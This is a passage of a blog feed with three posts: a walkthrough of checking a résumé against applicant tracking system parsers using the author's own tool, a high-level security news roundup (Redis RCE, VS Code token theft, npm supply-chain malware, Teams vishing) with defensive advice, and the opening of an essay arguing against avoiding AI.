href="https://substackcdn.com/image/fetch/$s_!Mbet!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7370d0c5-503d-468a-8176-7e96fcd88cad_1248x832.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Mbet!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7370d0c5-503d-468a-8176-7e96fcd88cad_1248x832.jpeg 424w, https://substackcdn.com/image/fetch/$s_!Mbet!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7370d0c5-503d-468a-8176-7e96fcd88cad_1248x832.jpeg 848w, https://substackcdn.com/image/fetch/$s_!Mbet!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7370d0c5-503d-468a-8176-7e96fcd88cad_1248x832.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!Mbet!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7370d0c5-503d-468a-8176-7e96fcd88cad_1248x832.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Mbet!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7370d0c5-503d-468a-8176-7e96fcd88cad_1248x832.jpeg" width="1248" height="832" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/7370d0c5-503d-468a-8176-7e96fcd88cad_1248x832.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:832,&quot;width&quot;:1248,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:253465,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://rodtrent.substack.com/i/200196904?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7370d0c5-503d-468a-8176-7e96fcd88cad_1248x832.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Mbet!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7370d0c5-503d-468a-8176-7e96fcd88cad_1248x832.jpeg 424w, https://substackcdn.com/image/fetch/$s_!Mbet!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7370d0c5-503d-468a-8176-7e96fcd88cad_1248x832.jpeg 848w, https://substackcdn.com/image/fetch/$s_!Mbet!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7370d0c5-503d-468a-8176-7e96fcd88cad_1248x832.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!Mbet!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7370d0c5-503d-468a-8176-7e96fcd88cad_1248x832.jpeg 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>For years I assumed my r&#233;sum&#233; was fine. It looked sharp: two clean columns, a skills sidebar, a little color, a tasteful icon next to my email. People complimented it. So when applications went quiet, I blamed the market, the timing, the role being &#8220;already filled.&#8221;</p><p>It turns out the problem wasn&#8217;t my experience. It was that a machine read my r&#233;sum&#233; before any human did, and the machine couldn&#8217;t make sense of it.</p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://rodtrent.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Rod&#8217;s Blog is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div><p>That machine is an <strong>Applicant Tracking System</strong>: Workday, Greenhouse, Taleo, iCIMS, Lever, and friends. Most mid-to-large employers run every r&#233;sum&#233; through one. It parses your file into fields, scores it against the job, and quietly filters out anything it can&#8217;t read cleanly. The cruel part: you never find out. There&#8217;s no bounce-back that says &#8220;your two-column layout scrambled and we couldn&#8217;t find your job titles.&#8221; You just don&#8217;t hear back.</p><p>So I sat down one afternoon and decided to actually <em>see</em> what the bots see. A couple of hours later I had a r&#233;sum&#233; that was genuinely better. Not prettier, <strong>better</strong>. And I understood exactly why. Here&#8217;s the walk-through.</p><h2><strong>Step 1: Watch a parser choke (&#8776;10 minutes)</strong></h2><p>The first thing I did was the free, no-signup part: <strong>Audit the Bots</strong> at <code>/audit</code>. You upload one r&#233;sum&#233; and it runs three different parsing strategies over the same file (a naive line reader, the raw content-stream order, and a column-aware pass) and shows you how differently each one reads it.</p><p>My beautiful two-column layout? The three parsers gave three different answers. My job title ended up wedged between a skill and a date. That&#8217;s the whole game right there: if the parsers disagree, your r&#233;sum&#233; is a coin flip every time you hit &#8220;Apply.&#8221; Seeing it laid out like that was the moment it clicked. The layout I was proud of was actively working against me.</p><h2><strong>Step 2: See exactly what the bot extracted (&#8776;15 minutes)</strong></h2><p>Next I ran a real check at <code>/scan</code>. Upload the PDF, and Past the Bots shows you <strong>&#8220;what the bot saw&#8221;</strong>: the literal name, email, phone, links, skills, and sections an ATS pulls out of your file.</p><p>This is the report I wish every job site showed you. Mine had problems I&#8217;d never have guessed:</p><ul><li><p>My phone number got swallowed because it sat inside a graphic.</p></li><li><p>A couple of skills I lead with weren&#8217;t being extracted at all.</p></li><li><p>One of my section headers was too &#8220;creative&#8221; to be recognized as Experience.</p></li></ul><p>Every issue came with a plain-language fix and a critical/warning/ok flag, so I knew what was actually killing me versus what was cosmetic. No jargon, no &#8220;optimization score&#8221; mystery meat. Just &#8220;here&#8217;s what&#8217;s broken and here&#8217;s why.&#8221;</p><h2><strong>Step 3: Match against a real job (&#8776;20 minutes)</strong></h2><p>Then I pasted in an actual job description I was targeting. (You can paste the link too, and it&#8217;ll fetch and pull the text out for you.) Past the Bots gives you a skill-weighted <strong>match score</strong>, the keywords you matched, the ones you&#8217;re missing, and any hard knockout gaps: the must-haves a system will reject you on outright.</p><p>This is where I stopped guessing. I could see, concretely, that the posting leaned hard on a few terms my r&#233;sum&#233; technically <em>earned</em> but never actually <em>said</em>. Not buzzword stuffing. I genuinely had the experience; I&#8217;d just described it in different words than the job did.</p><h2><strong>Step 4: Rebuild it, truthfully (&#8776;30 minutes)</strong></h2><p>Here&#8217;s the part that earns the word &#8220;proper.&#8221; With the Job-Hunt Pass, the <strong>AI tailoring</strong> rewrites your bullets to line up with the job, but it has a hard rule I really respect: <strong>it never fabricates experience.</strong> If a keyword isn&#8217;t supported by what&#8217;s actually on your r&#233;sum&#233;, it doesn&#8217;t get bolted into a bullet. It gets surfaced as a <em>gap</em> you can decide to address honestly. No inventing a skill you don&#8217;t have. No lying to a robot and then having to defend the lie in an interview.</p><p>On top of that, it generated a clean, single-column <strong>ATS-safe rebuild</strong> (the same content, reordered into the structure parsers expect), plus a tailored cover letter and a short recruiter outreach message. I exported the rebuild straight to <strong>.docx</strong>, tweaked two lines in Word to sound more like me, and that was it.</p><h2><strong>Step 5: Verify the fix (&#8776;10 minutes)</strong></h2><p>Last thing: I ran the new version back through the scanner. Phone number: detected. Skills: all there. Sections: mapped cleanly. Match score on my target role: up substantially, and for the right reason: I was now <em>saying</em> the things I&#8217;d actually done.</p><p>Total time, including me overthinking the wording: about two hours.</p><h2><strong>What I actually learned</strong></h2><p>A few things stuck with me:</p><ol><li><p><strong>&#8220;Looks good&#8221; and &#8220;parses well&#8221; are different sports.</strong> Multi-column layouts, text trapped in images, fancy tables, and clever section names are exactly the stuff that breaks ATS parsing. The plainer file usually wins.</p></li><li><p><strong>You&#8217;re often filtered for fixable reasons, not for fit.</strong> Mine was a buried phone number and a few unspoken keywords. That&#8217;s not a career problem; that&#8217;s a formatting problem.</p></li><li><p><strong>Tailoring honestly beats tailoring desperately.</strong> The strongest version of my r&#233;sum&#233; wasn&#8217;t padded. It just described my real work in the language the role used.</p></li></ol><p>I&#8217;m biased (I work on <strong><a href="https://pastthebots.com/">Past the Bots</a></strong>), but I built it because I needed it, and this afternoon was the proof. If your applications have gone quiet, don&#8217;t assume it&#8217;s you. Go run the free audit at <code>/audit</code> and watch what the bots actually do with your file. Worst case, you learn your r&#233;sum&#233; is rock-solid. Best case, you find the invisible thing that&#8217;s been filtering you out for months and you fix it before lunch.</p><p>A proper r&#233;sum&#233; didn&#8217;t take me a new career, a coach, or a week of agonizing. It took a couple of hours and the ability to finally <em>see the bot&#8217;s-eye view</em>.</p><p><em>Try it free, no signup for the audit, at <a href="https://pastthebots.com/">pastthebots.com</a>.</em></p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://rodtrent.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Rod&#8217;s Blog is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div>]]></content:encoded></item><item><title><![CDATA[Security Check-in Quick Hits: AI-Driven Vulns, Supply Chain Hits, and Zero-Days in the Wild]]></title><description><![CDATA[For June 4, 2026]]></description><link>https://rodtrent.substack.com/p/security-check-in-quick-hits-ai-driven-c56</link><guid isPermaLink="false">https://rodtrent.substack.com/p/security-check-in-quick-hits-ai-driven-c56</guid><dc:creator><![CDATA[Rod Trent]]></dc:creator><pubDate>Thu, 04 Jun 2026 18:01:44 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!BjO2!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F79c92997-5329-4387-9303-ea06e5c0614c_1248x832.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!BjO2!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F79c92997-5329-4387-9303-ea06e5c0614c_1248x832.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!BjO2!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F79c92997-5329-4387-9303-ea06e5c0614c_1248x832.jpeg 424w, https://substackcdn.com/image/fetch/$s_!BjO2!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F79c92997-5329-4387-9303-ea06e5c0614c_1248x832.jpeg 848w, https://substackcdn.com/image/fetch/$s_!BjO2!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F79c92997-5329-4387-9303-ea06e5c0614c_1248x832.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!BjO2!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F79c92997-5329-4387-9303-ea06e5c0614c_1248x832.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!BjO2!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F79c92997-5329-4387-9303-ea06e5c0614c_1248x832.jpeg" width="1248" height="832" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/79c92997-5329-4387-9303-ea06e5c0614c_1248x832.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:832,&quot;width&quot;:1248,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:300770,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://rodtrent.substack.com/i/200597884?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F79c92997-5329-4387-9303-ea06e5c0614c_1248x832.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!BjO2!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F79c92997-5329-4387-9303-ea06e5c0614c_1248x832.jpeg 424w, https://substackcdn.com/image/fetch/$s_!BjO2!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F79c92997-5329-4387-9303-ea06e5c0614c_1248x832.jpeg 848w, https://substackcdn.com/image/fetch/$s_!BjO2!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F79c92997-5329-4387-9303-ea06e5c0614c_1248x832.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!BjO2!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F79c92997-5329-4387-9303-ea06e5c0614c_1248x832.jpeg 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h3>AI Autonomously Discovers Long-Standing Redis RCE Vulnerability</h3><p>An autonomous AI tool recently uncovered a critical remote code execution (RCE) flaw in Redis (CVE-2026-23479) that had gone unnoticed for over two years. The vulnerability, introduced in Redis 7.2.0, allows authenticated users to execute OS commands on the server and affected multiple stable branches until patches rolled out on May 5.</p><p><strong>Why it matters</strong>: This highlights the accelerating role of AI in both defense and offense. As AI tools scan codebases faster than human teams, organizations must prioritize rapid patching cycles. Redis users should ensure they&#8217;re on the latest patched versions and review authentication controls tightly.</p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://rodtrent.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Rod&#8217;s Blog is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div><p><strong>Takeaway</strong>: AI is now finding what humans missed&#8212;your security tooling needs to keep pace.</p><h3>VS Code Zero-Day Enables One-Click GitHub Token Theft</h3><p>A zero-day vulnerability in Visual Studio Code allows attackers to steal GitHub tokens with a single click, posing a severe risk to developers and organizations relying on VS Code for workflows.</p><p><strong>Details</strong>: The flaw exploits how VS Code handles certain URIs or extensions, potentially leading to credential compromise and subsequent supply chain attacks via compromised repositories.</p><p><strong>Mitigation steps</strong>:</p><ul><li><p>Update VS Code immediately.</p></li><li><p>Use token scopes minimally.</p></li><li><p>Monitor GitHub for suspicious activity.</p></li><li><p>Consider disabling certain protocol handlers if not needed.</p></li></ul><p>This reinforces the need for vigilance in development environments, where tools trusted daily can become attack vectors.</p><h3>Red Hat Discloses Sophisticated npm Supply Chain Attack</h3><p>Red Hat revealed details of a supply chain attack involving malicious npm packages, dubbed &#8220;Shai Hulud&#8221; malware, which exploited GitHub in a targeted breach.</p><p><strong>Impact</strong>: Attackers compromised open-source ecosystems by injecting backdoors into popular JavaScript packages, affecting downstream users who pulled in the tainted dependencies.</p><p><strong>Lessons learned</strong>:</p><ul><li><p>Verify package sources and use tools like npm audit.</p></li><li><p>Implement dependency scanning in CI/CD pipelines.</p></li><li><p>Adopt SBOM (Software Bill of Materials) practices for visibility.</p></li></ul><p>Supply chain attacks continue to rise as attackers target the trust placed in open-source repositories.</p><h3>Microsoft Teams Vishing Campaign Deploys Nimbus RAT</h3><p>Cybercriminals are using sophisticated vishing (voice phishing) attacks via Microsoft Teams, combining email flooding and Quick Assist to deploy the Nimbus Remote Access Trojan (RAT).</p><p><strong>How it works</strong>: Attackers flood targets with notifications, then guide them through &#8220;support&#8221; steps that install malware, giving full remote control.</p><p><strong>Defense recommendations</strong>:</p><ul><li><p>Train employees never to accept unsolicited Teams calls for tech support.</p></li><li><p>Enable MFA and review device enrollment policies.</p></li><li><p>Monitor for unusual Quick Assist usage.</p></li></ul><p>Social engineering remains highly effective, especially when leveraging trusted collaboration platforms.</p><h3>Rising AI Misuse in Cyberattack Preparation</h3><p>Security reports indicate that approximately 67% of banned accounts on a major AI platform were using the models to prepare cyberattacks, including malware development and vulnerability identification.</p><p><strong>Broader trend</strong>: Attackers are shifting from manual efforts to AI-automated workflows, accelerating exploit development and scaling operations. Combined with reports of cloud service abuse (AWS, Azure, Google Cloud) to mask malicious activity, the threat landscape is evolving rapidly.</p><p><strong>Action items</strong>:</p><ul><li><p>Monitor for anomalous AI usage in your environment.</p></li><li><p>Strengthen detection for AI-generated code and scripts.</p></li><li><p>Invest in AI-powered defensive tools that match the offense.</p></li></ul><h3>Final Thoughts</h3><p>Today&#8217;s quick hits show a clear pattern: AI is supercharging both discovery of vulnerabilities and the attacks themselves, while supply chain and social engineering vectors persist as high-impact risks. Organizations should focus on timely patching (especially CISA KEV-listed items like PAN-OS flaws), rigorous supply chain hygiene, and user awareness training.</p><p>Stay vigilant&#8212;the speed of threats is increasing, and proactive defense is non-negotiable. Check back tomorrow for the next Security Check-in.</p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://rodtrent.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Rod&#8217;s Blog is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div>]]></content:encoded></item><item><title><![CDATA[Avoiding AI at Your Own Risk]]></title><description><![CDATA[Or, How to Volunteer as the Main Character in the "2026 Luddite Hall of Fame" While Everyone Else Gets Superpowers]]></description><link>https://rodtrent.substack.com/p/avoiding-ai-at-your-own-risk</link><guid isPermaLink="false">https://rodtrent.substack.com/p/avoiding-ai-at-your-own-risk</guid><dc:creator><![CDATA[Rod Trent]]></dc:creator><pubDate>Thu, 04 Jun 2026 12:02:30 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!GYw0!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F459a188d-006a-4551-b9f3-a8c79cd5357a_1248x832.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!GYw0!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F459a188d-006a-4551-b9f3-a8c79cd5357a_1248x832.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!GYw0!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F459a188d-006a-4551-b9f3-a8c79cd5357a_1248x832.jpeg 424w, https://substackcdn.com/image/fetch/$s_!GYw0!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F459a188d-006a-4551-b9f3-a8c79cd5357a_1248x832.jpeg 848w, https://substackcdn.com/image/fetch/$s_!GYw0!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F459a188d-006a-4551-b9f3-a8c79cd5357a_1248x832.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!GYw0!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F459a188d-006a-4551-b9f3-a8c79cd5357a_1248x832.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!GYw0!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F459a188d-006a-4551-b9f3-a8c79cd5357a_1248x832.jpeg" width="1248" height="832" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/459a188d-006a-4551-b9f3-a8c79cd5357a_1248x832.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:832,&quot;width&quot;:1248,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:343366,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://rodtrent.substack.com/i/197585999?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F459a188d-006a-4551-b9f3-a8c79cd5357a_1248x832.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!GYw0!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F459a188d-006a-4551-b9f3-a8c79cd5357a_1248x832.jpeg 424w, https://substackcdn.com/image/fetch/$s_!GYw0!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F459a188d-006a-4551-b9f3-a8c79cd5357a_1248x832.jpeg 848w, https://substackcdn.com/image/fetch/$s_!GYw0!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F459a188d-006a-4551-b9f3-a8c79cd5357a_1248x832.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!GYw0!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F459a188d-006a-4551-b9f3-a8c79cd5357a_1248x832.jpeg 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>You&#8217;ve seen them. The Reddit threads, the comment sections, the dinner-table declarations: &#8220;I&#8217;ll never use AI. It&#8217;s cheating. It&#8217;s dumb. It&#8217;s going to take my job and I refuse to play along.&#8221;</p><p>Some of these folks are trolling. Some are genuinely scared. And a shrinking number still believe they can opt out entirely and thrive. They&#8217;re wrong. Avoiding AI today is the modern equivalent of refusing to use email in the 1990s or the internet in the early 2000s. You can do it. You&#8217;ll just be slower, poorer, and increasingly irrelevant while the world moves on without you.</p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://rodtrent.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div 